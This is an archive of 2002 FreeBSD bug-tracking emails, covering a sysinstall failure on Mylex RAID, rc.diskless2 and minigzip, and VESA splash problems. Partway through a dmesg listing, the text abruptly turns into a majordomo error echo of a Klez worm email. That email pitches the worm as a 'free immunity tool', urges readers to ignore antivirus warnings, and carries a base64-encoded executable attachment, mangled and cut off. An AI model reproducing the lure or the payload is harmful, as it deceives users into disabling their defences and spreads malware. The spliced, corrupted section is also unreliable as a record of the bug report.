nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g7LH1VOT096165 for ; Wed, 21 Aug 2002 10:01:31 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g7LH1Vxr096164; Wed, 21 Aug 2002 10:01:31 -0700 (PDT) Message-Id: <200208211701.g7LH1Vxr096164@www.freebsd.org> Date: Wed, 21 Aug 2002 10:01:31 -0700 (PDT) From: David Drum To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/41850: sysinstall fails to create root filesystem on Mylex RAID controller Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41850 >Category: kern >Synopsis: sysinstall fails to create root filesystem on Mylex RAID controller >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Aug 21 10:10:02 PDT 2002 >Closed-Date: >Last-Modified: >Originator: David Drum >Release: 4.6.2-RELEASE >Organization: The Paul Saab Fan Club >Environment: N/A - pre-installation bug >Description: Creation of root filesystem on Mylex AcceleRAID 250 controller fails. Installation is aborted with recommendation to check debug output. It reads: .. DEBUG: Scanning disk mlxd0 for root filesystem DEBUG: Scanning disk mlxd0 for swap partitions Syntax error: Unterminated quoted string >How-To-Repeat: Try to install 4.6.2. >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Aug 21 10:53:51 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C6AC337B400; Wed, 21 Aug 2002 10:53:49 -0700 (PDT) Received: from elvis.mu.org (elvis.mu.org [192.203.228.196]) by mx1.FreeBSD.org (Postfix) with ESMTP id 98BC343E9C; Wed, 21 Aug 2002 10:53:49 -0700 (PDT) (envelope-from david@elvis.mu.org) Received: by elvis.mu.org (Postfix, from userid 1061) id 56C7AAE1D7; Wed, 21 Aug 2002 10:53:49 -0700 (PDT) Date: Wed, 21 Aug 2002 10:53:49 -0700 From: David Drum To: FreeBSD-gnats-submit@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/41850: sysinstall fails to create root filesystem on Mylex RAID controller Message-ID: <20020821175349.GA35063@elvis.mu.org> References: <200208211701.g7LH1Vxr096164@www.freebsd.org> <200208211710.g7LHA22I092757@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200208211710.g7LHA22I092757@freefall.freebsd.org> User-Agent: Mutt/1.3.27i Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This appears only to occur when installing No Boot Manager. Specifying the FreeBSD Boot Manager works. Quoth FreeBSD-gnats-submit@FreeBSD.org: > http://www.freebsd.org/cgi/query-pr.cgi?pr=41850 > > >Category: kern > >Responsible: freebsd-bugs > >Synopsis: sysinstall fails to create root filesystem on Mylex RAID controller > >Arrival-Date: Wed Aug 21 10:10:02 PDT 2002 Regards, David Drum david@mu.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Aug 21 11: 0: 7 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 74EC437B400 for ; Wed, 21 Aug 2002 11:00:05 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3F97443E72 for ; Wed, 21 Aug 2002 11:00:05 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7LI05JU002279 for ; Wed, 21 Aug 2002 11:00:05 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7LI051C002278; Wed, 21 Aug 2002 11:00:05 -0700 (PDT) Date: Wed, 21 Aug 2002 11:00:05 -0700 (PDT) Message-Id: <200208211800.g7LI051C002278@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: David Drum Subject: Re: kern/41850: sysinstall fails to create root filesystem on Mylex RAID controller Reply-To: David Drum Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/41850; it has been noted by GNATS. From: David Drum To: FreeBSD-gnats-submit@FreeBSD.org, freebsd-bugs@FreeBSD.org Cc: Subject: Re: kern/41850: sysinstall fails to create root filesystem on Mylex RAID controller Date: Wed, 21 Aug 2002 10:53:49 -0700 This appears only to occur when installing No Boot Manager. Specifying the FreeBSD Boot Manager works. Quoth FreeBSD-gnats-submit@FreeBSD.org: > http://www.freebsd.org/cgi/query-pr.cgi?pr=41850 > > >Category: kern > >Responsible: freebsd-bugs > >Synopsis: sysinstall fails to create root filesystem on Mylex RAID controller > >Arrival-Date: Wed Aug 21 10:10:02 PDT 2002 Regards, David Drum david@mu.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Aug 21 12: 3: 4 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8F8F737B400; Wed, 21 Aug 2002 12:03:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id B41CF43E97; Wed, 21 Aug 2002 12:03:01 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7LJ31JU026390; Wed, 21 Aug 2002 12:03:01 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7LJ31Gn026386; Wed, 21 Aug 2002 12:03:01 -0700 (PDT) Date: Wed, 21 Aug 2002 12:03:01 -0700 (PDT) From: Johan Karlsson Message-Id: <200208211903.g7LJ31Gn026386@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, markm@FreeBSD.org Subject: Re: bin/7136: kerberized telnetd doesn't use gettytab %m %r %v %s tags Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: kerberized telnetd doesn't use gettytab %m %r %v %s tags Responsible-Changed-From-To: freebsd-bugs->markm Responsible-Changed-By: johan Responsible-Changed-When: Wed Aug 21 12:01:34 PDT 2002 Responsible-Changed-Why: Mark, can you please have a look at this. http://www.freebsd.org/cgi/query-pr.cgi?pr=7136 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Aug 21 12:10:11 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BD72437B401 for ; Wed, 21 Aug 2002 12:10:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6DE6B43E8A for ; Wed, 21 Aug 2002 12:10:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7LJA2JU031047 for ; Wed, 21 Aug 2002 12:10:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7LJA2vj031046; Wed, 21 Aug 2002 12:10:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8102437B400 for ; Wed, 21 Aug 2002 12:08:08 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4AB4043E6A for ; Wed, 21 Aug 2002 12:08:08 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g7LJ86OT015035 for ; Wed, 21 Aug 2002 12:08:06 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g7LJ86eI015034; Wed, 21 Aug 2002 12:08:06 -0700 (PDT) Message-Id: <200208211908.g7LJ86eI015034@www.freebsd.org> Date: Wed, 21 Aug 2002 12:08:06 -0700 (PDT) From: Gaspar Chilingarov To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: conf/41855: improvment of /etc/rc.diskless2 script Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41855 >Category: conf >Synopsis: improvment of /etc/rc.diskless2 script >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Aug 21 12:10:02 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Gaspar Chilingarov >Release: 4.6.2 >Organization: WEB Ltd. >Environment: freshly installed 4.6.2 release from CD >Description: at very bottom of /etc/rc.diskless2 there are command (cd /; gzip -dc /tmp/dev.cpio.gz | cpio ..... ) in case when gzip is replaced(hardlinked) with minigzip this fails and system will not boot, because minigzip does not understand -c option. Better way is a (cd /; cat /tmp/dev.cpio.gz | gzip -d | cpio .... ) this will work both with gzip and minigzip On embedded system preferable to save space, so extra 100K is a good reason to throw away gzip :) >How-To-Repeat: hardlink gzip to minigzip and try to run /etc/rc.diskless2 file for embedded system booting. >Fix: see above >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Aug 21 12:10:19 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EEC1E37B405 for ; Wed, 21 Aug 2002 12:10:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id ECDCA43E84 for ; Wed, 21 Aug 2002 12:10:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7LJA2JU031061 for ; Wed, 21 Aug 2002 12:10:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7LJA2fo031060; Wed, 21 Aug 2002 12:10:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EEBFC37B400 for ; Wed, 21 Aug 2002 12:08:43 -0700 (PDT) Received: from thuvia.demon.co.uk (thuvia.demon.co.uk [193.237.34.248]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6C38A43E6E for ; Wed, 21 Aug 2002 12:08:42 -0700 (PDT) (envelope-from mark@thuvia.demon.co.uk) Received: from dotar.thuvia.org (dotar.thuvia.org [10.0.0.4]) by phaidor.thuvia.org (8.12.3/8.12.3) with ESMTP id g7LJ8ecF006859 for ; Wed, 21 Aug 2002 20:08:40 +0100 (BST) (envelope-from mark@thuvia.demon.co.uk) Received: from dotar.thuvia.org (localhost [IPv6:::1]) by dotar.thuvia.org (8.12.5/8.12.5) with ESMTP id g7LJ8dI1012517 for ; Wed, 21 Aug 2002 20:08:39 +0100 (BST) (envelope-from mark@dotar.thuvia.org) Received: (from mark@localhost) by dotar.thuvia.org (8.12.5/8.12.5/Submit) id g7LJ8dR0012516; Wed, 21 Aug 2002 20:08:39 +0100 (BST) (envelope-from mark) Message-Id: <200208211908.g7LJ8dR0012516@dotar.thuvia.org> Date: Wed, 21 Aug 2002 20:08:39 +0100 (BST) From: Mark Valentine Reply-To: Mark Valentine To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: kern/41856: VESA splash screen problems on ThinkPad 240X Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41856 >Category: kern >Synopsis: VESA splash screen problems on ThinkPad 240X >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Aug 21 12:10:02 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Mark Valentine >Release: FreeBSD 4.6.2-RELEASE i386 >Organization: >Environment: FreeBSD 4.6.2 GENERIC kernel, IBM ThinkPad 240X laptop (SMI LynxEM+ video) >Description: Loading the VESA module on this laptop causes the splash screen to appear corrupted, although the same 320x200 splash image appears fine without the VESA module loaded (and also displays fine as a screen saver even if the VESA module is subsequently loaded; however, the screen saver image is still corrupt if VESA was loaded at boot time, even if the VESA module is subsequently unloaded). With the 320x200 image, the display appears as eight tiny versions of the splash image strung horizontally along the top central portion of the screen. An 800x600 image is displayed as indeterminate corruption in the top portion of the full screen. I see the same behaviour for BMP and PCX splash images. >How-To-Repeat: Use the following in /boot/loader.conf: vesa_load="YES" splash_bmp_load="YES" bitmap_load="YES" bitmap_name="/boot/power_logo2.bmp" >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Aug 21 12:16:45 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AC61237B400; Wed, 21 Aug 2002 12:16:43 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 63BF843E86; Wed, 21 Aug 2002 12:16:43 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7LJGhJU032730; Wed, 21 Aug 2002 12:16:43 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7LJGhD7032726; Wed, 21 Aug 2002 12:16:43 -0700 (PDT) Date: Wed, 21 Aug 2002 12:16:43 -0700 (PDT) From: Johan Karlsson Message-Id: <200208211916.g7LJGhD7032726@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, dougb@FreeBSD.org Subject: Re: bin/10283: Race condition in rc.network Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Race condition in rc.network Responsible-Changed-From-To: freebsd-bugs->dougb Responsible-Changed-By: johan Responsible-Changed-When: Wed Aug 21 12:15:25 PDT 2002 Responsible-Changed-Why: Doug has been doing commits in this area before. http://www.freebsd.org/cgi/query-pr.cgi?pr=10283 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Aug 21 12:25:54 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 34A5637B400; Wed, 21 Aug 2002 12:25:53 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id E075943E42; Wed, 21 Aug 2002 12:25:52 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7LJPqJU034846; Wed, 21 Aug 2002 12:25:52 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7LJPlJ3034835; Wed, 21 Aug 2002 12:25:47 -0700 (PDT) Date: Wed, 21 Aug 2002 12:25:47 -0700 (PDT) From: Johan Karlsson Message-Id: <200208211925.g7LJPlJ3034835@freefall.freebsd.org> To: aa8vb@ipass.net, johan@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/14602: struct utsname fields are allocated too small Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: struct utsname fields are allocated too small State-Changed-From-To: open->closed State-Changed-By: johan State-Changed-When: Wed Aug 21 12:24:22 PDT 2002 State-Changed-Why: Duplicate of PR 4688, which was closed after SYS_NMLN was increased to 256. http://www.freebsd.org/cgi/query-pr.cgi?pr=14602 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Aug 21 12:30:51 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AA9E137B400; Wed, 21 Aug 2002 12:30:48 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 60EC043E4A; Wed, 21 Aug 2002 12:30:48 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7LJUmJU036420; Wed, 21 Aug 2002 12:30:48 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7LJUmQh036416; Wed, 21 Aug 2002 12:30:48 -0700 (PDT) Date: Wed, 21 Aug 2002 12:30:48 -0700 (PDT) From: Johan Karlsson Message-Id: <200208211930.g7LJUmQh036416@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, murray@FreeBSD.org Subject: Re: kern/14848: Frame Relay support, corrected Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Frame Relay support, corrected Responsible-Changed-From-To: freebsd-bugs->murray Responsible-Changed-By: johan Responsible-Changed-When: Wed Aug 21 12:30:03 PDT 2002 Responsible-Changed-Why: Over to murray who is looking at the related PR 21771. http://www.freebsd.org/cgi/query-pr.cgi?pr=14848 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Aug 21 12:40:30 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1D1CD37B400 for ; Wed, 21 Aug 2002 12:40:05 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id B4B8843E42 for ; Wed, 21 Aug 2002 12:40:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7LJe4JU037688 for ; Wed, 21 Aug 2002 12:40:04 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7LJe40K037687; Wed, 21 Aug 2002 12:40:04 -0700 (PDT) Date: Wed, 21 Aug 2002 12:40:04 -0700 (PDT) Message-Id: <200208211940.g7LJe40K037687@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Mark Valentine Subject: Re: kern/41856: VESA splash screen problems on ThinkPad 240X Reply-To: Mark Valentine Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/41856; it has been noted by GNATS. From: Mark Valentine To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: kern/41856: VESA splash screen problems on ThinkPad 240X Date: Wed, 21 Aug 2002 20:33:22 +0100 (BST) Oops, I meant to include the dmesg output and list of video modes reported by "vidcontrol -i mode" below. Copyright (c) 1992-2002 The FreeBSD Project. Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994 The Regents of the University of California. All rights reserved. FreeBSD 4.6.2-RELEASE #0: Mon Aug 19 22:03:13 BST 2002 root@thuvia.co.uk:/usr/src/sys/compile/LAPTOP Timecounter "i8254" frequency 1193182 Hz CPU: Pentium III/Pentium III Xeon/Celeron (497.84-MHz 686-class CPU) Origin = "GenuineIntel" Id = 0x683 Stepping = 3 Features=0x383f9ff real memory = 134152192 (131008K bytes) config> di sn0 config> di lnc0 config> di ie0 config> di fe0 config> di cs0 config> di bt0 config> di aic0 config> di aha0 config> di adv0 config> q avail memory = 125423616 (122484K bytes) Preloaded elf kernel "kernel" at 0xc0502000. Preloaded userconfig_script "/boot/kernel.conf" at 0xc050209c. Preloaded elf module "splash_bmp.ko" at 0xc05020ec. Preloaded splash_image_data "/boot/power_logo2.bmp" at 0xc0502190. Preloaded elf module "snd_cs4281.ko" at 0xc05021e4. Preloaded elf module "snd_pcm.ko" at 0xc0502288. Pentium Pro MTRR support enabled md0: Malloc disk Using $PIR table, 6 entries at 0xc00fdf60 npx0: on motherboard npx0: INT 16 interface pcib0: on motherboard pci0: on pcib0 isab0: at device 7.0 on pci0 isa0: on isab0 atapci0: port 0x1420-0x142f at device 7.1 on pci0 ata0: at 0x1f0 irq 14 on atapci0 ata1: at 0x170 irq 15 on atapci0 uhci0: port 0x1400-0x141f irq 11 at device 7.2 on pci0 usb0: on uhci0 usb0: USB revision 1.0 uhub0: Intel UHCI root hub, class 9/0, rev 1.00/1.00, addr 1 uhub0: 2 ports with 2 removable, self powered chip1: port 0x2180-0x218f at device 7.3 on pci0 pci0: at 9.0 pcic0: irq 11 at device 10.0 on pci0 pcic0: PCI Memory allocated: 0x44000000 pcic0: TI12XX PCI Config Reg: [ring enable][speaker enable][pwr save][CSC serial isa irq] pccard0: on pcic0 pcm0: mem 0xfc000000-0xfc00ffff,0xfc010000-0xfc010fff irq 5 at device 11.0 on pci0 pci0: (vendor=0x11c1, dev=0x0449) at 12.0 irq 11 orm0: **** Command '' not recognized. >>>> >>>> Klez.E is the most common world-wide spreading worm.It's very dangerous by corrupting your files.
**** Command 'klez.e' not recognized. >>>> Because of its very smart stealth and anti-anti-virus technic,most common AV software can't detect or clean it.
**** Command 'because' not recognized. >>>> We developed this free immunity tool to defeat the malicious virus.
**** Command 'we' not recognized. >>>> You only need to run this tool once,and then Klez will never come into your PC.
**** Command 'you' not recognized. >>>> NOTE: Because this tool acts as a fake Klez to fool the real worm,some AV monitor maybe cry when you run it.
**** Command 'note:' not recognized. >>>> If so,Ignore the warning,and select 'continue'.
**** Command 'if' not recognized. >>>> If you have any question,please mail to me. **** Command 'if' not recognized. >>>> >>>> --L4O1M9P3D17 **** Command '--l4o1m9p3d17' not recognized. >>>> Content-Type: application/octet-stream; **** Command 'content-type:' not recognized. >>>> name=066-068.bat **** Command 'name=066-068.bat' not recognized. >>>> Content-Transfer-Encoding: base64 **** Command 'content-transfer-encoding:' not recognized. >>>> Content-ID: **** Command 'content-id:' not recognized. >>>> >>>> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g **** Command 'aaaaaaaa2aaaaa4fug4atannibgbtm0hvghpcybwcm9ncmftignhbm5vdcbizsbydw4gaw4g' not recognized. >>>> RE9TIG1vZGUuDQ0KJAAAAAAAAAAYmX3gXPgTs1z4E7Nc+BOzJ+Qfs1j4E7Pf5B2zT/gTs7Tn **** Command 're9tig1vzguudq0kjaaaaaaaaaaymx3gxpgts1z4e7nc+bozj+qfs1j4e7pf5b2zt/gts7tn' not recognized. >>>> GbNm+BOzPucAs1X4E7Nc+BKzJfgTs7TnGLNO+BOz5P4Vs134E7NSaWNoXPgTswAAAAAAAAAA **** Command 'gbnm+bozpucas1x4e7nc+bkzjfgts7tnglno+boz5p4vs134e7nsawnoxpgtswaaaaaaaaaa' not recognized. >>>> UEUAAEwBBAC4jrc8AAAAAAAAAADgAA8BCwEGAADAAAAAkAgAAAAAAFiEAAAAEAAAANAAAAAA **** Command 'ueuaaewbbac4jrc8aaaaaaaaaadgaa8bcwegaadaaaaakagaaaaaafieaaaaeaaaanaaaaaa' not recognized. >>>> QAAAEAAAABAAAAQAAAAAAAAABAAAAAAAAAAAYAkAABAAAAAAAAACAAAAAAAQAAAQAAAAABAA **** Command 'qaaaeaaaabaaaaqaaaaaaaaabaaaaaaaaaaayakaabaaaaaaaaacaaaaaaaqaaaqaaaaabaa' not recognized. >>>> ABAAAAAAAAAQAAAAAAAAAAAAAAAg1gAAZAAAAABQCQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'abaaaaaaaaaqaaaaaaaaaaaaaaag1gaazaaaaabqcqaqaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> ANAAAOwBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAEq6AAAAEAAAAMAAAAAQ **** Command 'anaaaowbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaudgv4daaaaeq6aaaaeaaaamaaaaaq' not recognized. >>>> AAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAAiEAAAANAAAAAgAAAA0AAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaagaabglnjkyxrhaaaieaaaanaaaaagaaaa0aaaaaaaaaaaaaaaaaaa' not recognized. >>>> QAAAQC5kYXRhAAAAbF4IAADwAAAAUAAAAPAAAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAABAA **** Command 'qaaaqc5kyxrhaaaabf4iaadwaaaauaaaapaaaaaaaaaaaaaaaaaaaeaaamaucnnyywaaabaa' not recognized. >>>> AAAAUAkAEAAAAABAAQAAAAAAAAAAAAAAAABAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaauakaeaaaaabaaqaaaaaaaaaaaaaaaabaaabaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 